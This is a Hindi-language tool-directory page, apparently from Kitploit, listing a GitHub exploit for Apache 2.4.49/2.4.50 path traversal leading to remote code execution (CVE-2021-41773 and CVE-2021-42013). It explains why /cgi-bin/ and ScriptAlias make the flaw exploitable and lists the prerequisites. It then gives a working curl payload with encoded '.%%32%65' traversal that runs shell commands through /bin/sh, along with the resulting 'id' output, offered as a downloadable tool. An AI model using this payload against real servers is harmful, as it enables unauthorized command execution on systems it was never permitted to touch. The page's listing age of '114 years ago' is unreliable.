Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/mr-exo/cve-2021-41773
टोहीपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubmr-exo/cve-2021-41773

CVE-2021-41773

Apache सर्वरों के लिए रिमोट कोड निष्पादन शोषण। प्रभावित संस्करण: Apache 2.4.49, Apache 2.4.50

रिपॉजिटरी देखें
114 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Apache 2.4.49 (CVE-2021-41773) और 2.4.50 (CVE-2021-42013) दोनों के लिए RCE शोषण:

मेरी विनम्र राय में केवल "विशेष" सेटअप ही इस RCE के लिए संवेदनशील होंगे।
यही बात "आर्बिट्ररी फाइल रीड" शोषण पर भी लागू होती है जो आपने देखे हैं।

दोनों सीवीई वास्तव में लगभग एक ही पथ-ट्रैवर्सल कमज़ोरी हैं (दूसरा पहले वाले का अधूरा फिक्स है)।
पथ ट्रैवर्सल केवल मैप की गई URI से काम करता है (जैसे "Alias" या "ScriptAlias" Apache निर्देशों के माध्यम से)। केवल DocumentRoot पर्याप्त नहीं है।

"/cgi-bin/" डिफ़ॉल्ट रूप से मैप होता है (ScriptAlias) इसलिए इसका उपयोग पथ ट्रैवर्सल स्ट्रिंग से पहले किया जाता है।
इसके अलावा, ScriptAlias दिए गए निर्देशिका की सभी सामग्री को (फ़ाइल एक्सटेंशन की परवाह किए बिना) Apache के लिए Exec के रूप में चिह्नित करता है।

आवश्यकताएँ:

1/ mod_cgi सक्षम (डिफ़ॉल्ट नहीं लेकिन आसान)
2/ लक्ष्य बायनरी +x होनी चाहिए (/bin/sh के लिए डिफ़ॉल्ट)
3/ Apache अनुमतियाँ /bin या / के लिए प्रदान की गईं (डिफ़ॉल्ट नहीं और कठिन/अवास्तविक)

जाँचें कि सर्वर संवेदनशील है या नहीं:

curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'

संवेदनशील सर्वर से प्रतिक्रिया:

uid=1(daemon) gid=1(daemon) groups=1(daemon)

टूल डाउनलोड करें